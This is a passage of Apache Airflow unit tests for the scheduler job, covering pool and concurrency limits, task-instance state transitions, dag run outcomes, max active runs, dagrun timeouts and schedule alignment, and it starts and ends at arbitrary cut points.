dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1, pool='a')
task2 = DummyOperator(dag=dag, task_id=task_id_2, pool='b')
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
tis = ([
TI(task1, dr1.execution_date),
TI(task2, dr1.execution_date),
TI(task1, dr2.execution_date),
TI(task2, dr2.execution_date)
])
for ti in tis:
ti.state = State.SCHEDULED
session.merge(ti)
pool = models.Pool(pool='a', slots=1, description='haha')
pool2 = models.Pool(pool='b', slots=100, description='haha')
session.add(pool)
session.add(pool2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
session.commit()
self.assertEqual(3, len(res))
res_keys = []
for ti in res:
res_keys.append(ti.key)
self.assertIn(tis[0].key, res_keys)
self.assertIn(tis[1].key, res_keys)
self.assertIn(tis[3].key, res_keys)
def test_nonexistent_pool(self):
dag_id = 'SchedulerJobTest.test_nonexistent_pool'
task_id = 'dummy_wrong_pool'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task = DummyOperator(dag=dag, task_id=task_id, pool="this_pool_doesnt_exist")
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr = scheduler.create_dag_run(dag)
ti = TI(task, dr.execution_date)
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
session.commit()
self.assertEqual(0, len(res))
def test_find_executable_task_instances_none(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_none'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
scheduler.create_dag_run(dag)
session.commit()
self.assertEqual(0, len(scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)))
def test_find_executable_task_instances_concurrency(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.RUNNING
ti2.state = State.SCHEDULED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
res_keys = map(lambda x: x.key, res)
self.assertIn(ti2.key, res_keys)
ti2.state = State.RUNNING
session.merge(ti2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(0, len(res))
def test_find_executable_task_instances_task_concurrency(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_task_concurrency'
task_id_1 = 'dummy'
task_id_2 = 'dummy2'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1, task_concurrency=2)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1_1 = TI(task1, dr1.execution_date)
ti2 = TI(task2, dr1.execution_date)
ti1_1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
ti1_1.state = State.RUNNING
ti2.state = State.RUNNING
ti1_2 = TI(task1, dr2.execution_date)
ti1_2.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti2)
session.merge(ti1_2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
ti1_2.state = State.RUNNING
ti1_3 = TI(task1, dr3.execution_date)
ti1_3.state = State.SCHEDULED
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(0, len(res))
ti1_1.state = State.SCHEDULED
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
ti1_1.state = State.RUNNING
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
def test_change_state_for_executable_task_instances_no_tis(self):
scheduler = SchedulerJob()
session = settings.Session()
res = scheduler._change_state_for_executable_task_instances(
[], [State.NONE], session)
self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_no_tis_with_state(self):
dag_id = 'SchedulerJobTest.test_change_state_for__no_tis_with_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._change_state_for_executable_task_instances(
[ti1, ti2, ti3],
[State.RUNNING],
session)
self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_none_state(self):
dag_id = 'SchedulerJobTest.test_change_state_for__none_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.QUEUED
ti3.state = State.NONE
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._change_state_for_executable_task_instances(
[ti1, ti2, ti3],
[State.NONE, State.SCHEDULED],
session)
self.assertEqual(2, len(res))
ti1.refresh_from_db()
ti3.refresh_from_db()
self.assertEqual(State.QUEUED, ti1.state)
self.assertEqual(State.QUEUED, ti3.state)
def test_enqueue_task_instances_with_queued_state(self):
dag_id = 'SchedulerJobTest.test_enqueue_task_instances_with_queued_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
session.merge(ti1)
session.commit()
with patch.object(BaseExecutor, 'queue_command') as mock_queue_command:
scheduler._enqueue_task_instances_with_queued_state(dagbag, [ti1])
mock_queue_command.assert_called()
def test_execute_task_instances_nothing(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_nothing'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = SimpleDagBag([])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti1.state = State.SCHEDULED
session.merge(ti1)
session.commit()
self.assertEqual(0, scheduler._execute_task_instances(dagbag, states=[State.SCHEDULED]))
def test_execute_task_instances(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances'
task_id_1 = 'dummy_task'
task_id_2 = 'dummy_task_nonexistent_queue'
# important that len(tasks) is less than concurrency
# because before scheduler._execute_task_instances would only
# check the num tasks once so if concurrency was 3,
# we could execute arbitrarily many tasks in the second run
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
# create first dag run with 1 running and 1 queued
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task2, dr1.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = State.RUNNING
ti2.state = State.RUNNING
session.merge(ti1)
session.merge(ti2)
session.commit()
self.assertEqual(State.RUNNING, dr1.state)
self.assertEqual(2, DAG.get_num_task_instances(dag_id, dag.task_ids,
states=[State.RUNNING], session=session))
# create second dag run
dr2 = scheduler.create_dag_run(dag)
ti3 = TI(task1, dr2.execution_date)
ti4 = TI(task2, dr2.execution_date)
ti3.refresh_from_db()
ti4.refresh_from_db()
# manually set to scheduled so we can pick them up
ti3.state = State.SCHEDULED
ti4.state = State.SCHEDULED
session.merge(ti3)
session.merge(ti4)
session.commit()
self.assertEqual(State.RUNNING, dr2.state)
res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
# check that concurrency is respected
ti1.refresh_from_db()
ti2.refresh_from_db()
ti3.refresh_from_db()
ti4.refresh_from_db()
self.assertEqual(3, DAG.get_num_task_instances(dag_id, dag.task_ids,
states=[State.RUNNING, State.QUEUED], session=session))
self.assertEqual(State.RUNNING, ti1.state)
self.assertEqual(State.RUNNING, ti2.state)
six.assertCountEqual(self, [State.QUEUED, State.SCHEDULED], [ti3.state, ti4.state])
self.assertEqual(1, res)
def test_execute_task_instances_limit(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_limit'
task_id_1 = 'dummy_task'
task_id_2 = 'dummy_task_2'
# important that len(tasks) is less than concurrency
# because before scheduler._execute_task_instances would only
# check the num tasks once so if concurrency was 3,
# we could execute arbitrarily many tasks in the second run
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
scheduler.max_tis_per_query = 3
session = settings.Session()
tis = []
for i in range(0, 4):
dr = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr.execution_date)
ti2 = TI(task2, dr.execution_date)
tis.append(ti1)
tis.append(ti2)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.commit()
res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
self.assertEqual(8, res)
for ti in tis:
ti.refresh_from_db()
self.assertEqual(State.QUEUED, ti.state)
def test_change_state_for_tis_without_dagrun(self):
dag1 = DAG(
dag_id='test_change_state_for_tis_without_dagrun',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag1,
owner='airflow')
DummyOperator(
task_id='dummy_b',
dag=dag1,
owner='airflow')
dag2 = DAG(
dag_id='test_change_state_for_tis_without_dagrun_dont_change',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag2,
owner='airflow')
dag3 = DAG(
dag_id='test_change_state_for_tis_without_dagrun_no_dagrun',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag3,
owner='airflow')
session = settings.Session()
dr1 = dag1.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
dr2 = dag2.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti1a = dr1.get_task_instance(task_id='dummy', session=session)
ti1a.state = State.SCHEDULED
ti1b = dr1.get_task_instance(task_id='dummy_b', session=session)
ti1b.state = State.SUCCESS
session.commit()
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.state = State.SCHEDULED
session.commit()
ti3 = TI(dag3.get_task('dummy'), DEFAULT_DATE)
ti3.state = State.SCHEDULED
session.merge(ti3)
session.commit()
dagbag = self._make_simple_dag_bag([dag1, dag2, dag3])
scheduler = SchedulerJob(num_runs=0, run_duration=0)
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti1a = dr1.get_task_instance(task_id='dummy', session=session)
ti1a.refresh_from_db(session=session)
self.assertEqual(ti1a.state, State.SCHEDULED)
ti1b = dr1.get_task_instance(task_id='dummy_b', session=session)
ti1b.refresh_from_db(session=session)
self.assertEqual(ti1b.state, State.SUCCESS)
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
ti3.refresh_from_db(session=session)
self.assertEquals(ti3.state, State.NONE)
dr1.refresh_from_db(session=session)
dr1.state = State.FAILED
# why o why
session.merge(dr1)
session.commit()
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti1a.refresh_from_db(session=session)
self.assertEqual(ti1a.state, State.NONE)
# don't touch ti1b
ti1b.refresh_from_db(session=session)
self.assertEqual(ti1b.state, State.SUCCESS)
# don't touch ti2
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
def test_execute_helper_reset_orphaned_tasks(self):
session = settings.Session()
dag = DAG(
'test_execute_helper_reset_orphaned_tasks',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
dr2 = dag.create_dagrun(run_id=BackfillJob.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE + datetime.timedelta(1),
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.SCHEDULED
ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
ti2.state = State.SCHEDULED
session.commit()
processor = mock.MagicMock()
processor.get_last_finish_time.return_value = None
scheduler = SchedulerJob(num_runs=0, run_duration=0)
executor = TestExecutor()
scheduler.executor = executor
scheduler._execute_helper(processor_manager=processor)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti.state, State.NONE)
ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
@provide_session
def evaluate_dagrun(
self,
dag_id,
expected_task_states, # dict of task_id: state
dagrun_state,
run_kwargs=None,
advance_execution_date=False,
session=None):
"""
Helper for testing DagRun states with simple two-task DAGS.
This is hackish: a dag run is created but its tasks are
run by a backfill.
"""
if run_kwargs is None:
run_kwargs = {}
scheduler = SchedulerJob()
dag = self.dagbag.get_dag(dag_id)
dag.clear()
dr = scheduler.create_dag_run(dag)
if advance_execution_date:
# run a second time to schedule a dagrun after the start_date
dr = scheduler.create_dag_run(dag)
ex_date = dr.execution_date
try:
dag.run(start_date=ex_date, end_date=ex_date, **run_kwargs)
except AirflowException:
pass
# test tasks
for task_id, expected_state in expected_task_states.items():
task = dag.get_task(task_id)
ti = TI(task, ex_date)
ti.refresh_from_db()
self.assertEqual(ti.state, expected_state)
# load dagrun
dr = DagRun.find(dag_id=dag_id, execution_date=ex_date)
dr = dr[0]
dr.dag = dag
self.assertEqual(dr.state, dagrun_state)
def test_dagrun_fail(self):
"""
DagRuns with one failed and one incomplete root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_fail',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.UPSTREAM_FAILED,
},
dagrun_state=State.FAILED)
def test_dagrun_success(self):
"""
DagRuns with one failed and one successful root task -> SUCCESS
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_success',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.SUCCESS,
},
dagrun_state=State.SUCCESS)
def test_dagrun_root_fail(self):
"""
DagRuns with one successful and one failed root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_root_fail',
expected_task_states={
'test_dagrun_succeed': State.SUCCESS,
'test_dagrun_fail': State.FAILED,
},
dagrun_state=State.FAILED)
def test_dagrun_root_fail_unfinished(self):
"""
DagRuns with one unfinished and one failed root task -> RUNNING
"""
# Run both the failed and successful tasks
scheduler = SchedulerJob()
dag_id = 'test_dagrun_states_root_fail_unfinished'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
dr = scheduler.create_dag_run(dag)
try:
dag.run(start_date=dr.execution_date, end_date=dr.execution_date)
except AirflowException: # Expect an exception since there is a failed task
pass
# Mark the successful task as never having run since we want to see if the
# dagrun will be in a running state despite haveing an unfinished task.
session = settings.Session()
ti = dr.get_task_instance('test_dagrun_unfinished', session=session)
ti.state = State.NONE
session.commit()
dr_state = dr.update_state()
self.assertEqual(dr_state, State.RUNNING)
def test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date(self):
"""
DagRun is marked a success if ignore_first_depends_on_past=True
Test that an otherwise-deadlocked dagrun is marked as a success
if ignore_first_depends_on_past=True and the dagrun execution_date
is after the start_date.
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
advance_execution_date=True,
run_kwargs=dict(ignore_first_depends_on_past=True))
def test_dagrun_deadlock_ignore_depends_on_past(self):
"""
Test that ignore_first_depends_on_past doesn't affect results
(this is the same test as
test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date except
that start_date == execution_date so depends_on_past is irrelevant).
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
run_kwargs=dict(ignore_first_depends_on_past=True))
def test_scheduler_start_date(self):
"""
Test that the scheduler respects start_dates, even when DAGS have run
"""
dag_id = 'test_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertTrue(dag.start_date > DEFAULT_DATE)
scheduler = SchedulerJob(dag_id,
num_runs=2)
scheduler.run()
# zero tasks ran
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
# previously, running this backfill would kick off the Scheduler
# because it would take the most recent run and start from there
# That behavior still exists, but now it will only do so if after the
# start date
backfill = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
backfill.run()
# one task ran
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
scheduler = SchedulerJob(dag_id,
num_runs=2)
scheduler.run()
# still one task
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
def test_scheduler_multiprocessing(self):
"""
Test that the scheduler can successfully queue multiple dags in parallel
"""
dag_ids = ['test_start_date_scheduling', 'test_dagrun_states_success']
for dag_id in dag_ids:
dag = self.dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_ids=dag_ids,
num_runs=2)
scheduler.run()
# zero tasks ran
dag_id = 'test_start_date_scheduling'
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
def test_scheduler_dagrun_once(self):
"""
Test if the scheduler does not create multiple dagruns
if a dag is scheduled with @once and a start_date
"""
dag = DAG(
'test_scheduler_dagrun_once',
start_date=timezone.datetime(2015, 1, 1),
schedule_interval="@once")
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
def test_scheduler_process_task_instances(self):
"""
Test if _process_task_instances puts the right task instances into the
queue.
"""
dag = DAG(
dag_id='test_scheduler_process_execute_task',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.append.assert_called_with(
(dag.dag_id, dag_task1.task_id, DEFAULT_DATE)
)
def test_scheduler_do_not_schedule_removed_task(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_removed_task',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dag = DAG(
dag_id='test_scheduler_do_not_schedule_removed_task',
start_date=DEFAULT_DATE)
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_do_not_schedule_too_early(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_too_early',
start_date=timezone.datetime(2200, 1, 1))
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_do_not_run_finished(self):
dag = DAG(
dag_id='test_scheduler_do_not_run_finished',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
tis = dr.get_task_instances(session=session)
for ti in tis:
ti.state = State.SUCCESS
session.commit()
session.close()
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_add_new_task(self):
"""
Test if a task instance will be added if the dag is updated
"""
dag = DAG(
dag_id='test_scheduler_add_new_task',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
tis = dr.get_task_instances()
self.assertEquals(len(tis), 1)
dag_task2 = DummyOperator(
task_id='dummy2',
dag=dag,
owner='airflow')
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
tis = dr.get_task_instances()
self.assertEquals(len(tis), 2)
def test_scheduler_verify_max_active_runs(self):
"""
Test if a a dagrun will not be scheduled if max_dag_runs has been reached
"""
dag = DAG(
dag_id='test_scheduler_verify_max_active_runs',
start_date=DEFAULT_DATE)
dag.max_active_runs = 1
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
def test_scheduler_fail_dagrun_timeout(self):
"""
Test if a a dagrun wil be set failed if timeout
"""
dag = DAG(
dag_id='test_scheduler_fail_dagrun_timeout',
start_date=DEFAULT_DATE)
dag.dagrun_timeout = datetime.timedelta(seconds=60)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
session.merge(dr)
session.commit()
dr2 = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr2)
dr.refresh_from_db(session=session)
self.assertEquals(dr.state, State.FAILED)
def test_scheduler_verify_max_active_runs_and_dagrun_timeout(self):
"""
Test if a a dagrun will not be scheduled if max_dag_runs has been reached and dagrun_timeout is not reached
Test if a a dagrun will be scheduled if max_dag_runs has been reached but dagrun_timeout is also reached
"""
dag = DAG(
dag_id='test_scheduler_verify_max_active_runs_and_dagrun_timeout',
start_date=DEFAULT_DATE)
dag.max_active_runs = 1
dag.dagrun_timeout = datetime.timedelta(seconds=60)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
# Should not be scheduled as DagRun has not timedout and max_active_runs is reached
new_dr = scheduler.create_dag_run(dag)
self.assertIsNone(new_dr)
# Should be scheduled as dagrun_timeout has passed
dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
session.merge(dr)
session.commit()
new_dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(new_dr)
def test_scheduler_max_active_runs_respected_after_clear(self):
"""
Test if _process_task_instances only schedules ti's up to max_active_runs
(related to issue AIRFLOW-137)
"""
dag = DAG(
dag_id='test_scheduler_max_active_runs_respected_after_clear',
start_date=DEFAULT_DATE)
dag.max_active_runs = 3
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
# First create up to 3 dagruns in RUNNING state.
scheduler.create_dag_run(dag)
# Reduce max_active_runs to 1
dag.max_active_runs = 1
queue = Mock()
# and schedule them in, so we can check how many
# tasks are put on the queue (should be one, not 3)
scheduler._process_task_instances(dag, queue=queue)
queue.append.assert_called_with(
(dag.dag_id, dag_task1.task_id, DEFAULT_DATE)
)
@patch.object(TI, 'pool_full')
def test_scheduler_verify_pool_full(self, mock_pool_full):
"""
Test task instances not queued when pool is full
"""
mock_pool_full.return_value = False
dag = DAG(
dag_id='test_scheduler_verify_pool_full',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow',
pool='test_scheduler_verify_pool_full')
session = settings.Session()
pool = Pool(pool='test_scheduler_verify_pool_full', slots=1)
session.add(pool)
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
# Create 2 dagruns, which will create 2 task instances.
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEquals(dr.execution_date, DEFAULT_DATE)
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
queue = []
scheduler._process_task_instances(dag, queue=queue)
self.assertEquals(len(queue), 2)
dagbag = self._make_simple_dag_bag([dag])
# Recreated part of the scheduler here, to kick off tasks -> executor
for ti_key in queue:
task = dag.get_task(ti_key[1])
ti = TI(task, ti_key[2])
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# Also save this task instance to the DB.
session.merge(ti)
session.commit()
scheduler._execute_task_instances(dagbag,
(State.SCHEDULED,
State.UP_FOR_RETRY))
self.assertEquals(len(scheduler.executor.queued_tasks), 1)
def test_scheduler_auto_align(self):
"""
Test if the schedule_interval will be auto aligned with the start_date
such that if the start_date coincides with the schedule the first
execution_date will be start_date, otherwise it will be start_date +
interval.
"""
dag = DAG(
dag_id='test_scheduler_auto_align_1',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="4 5 * * *"
)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEquals(dr.execution_date, timezone.datetime(2016, 1, 2, 5, 4))
dag = DAG(
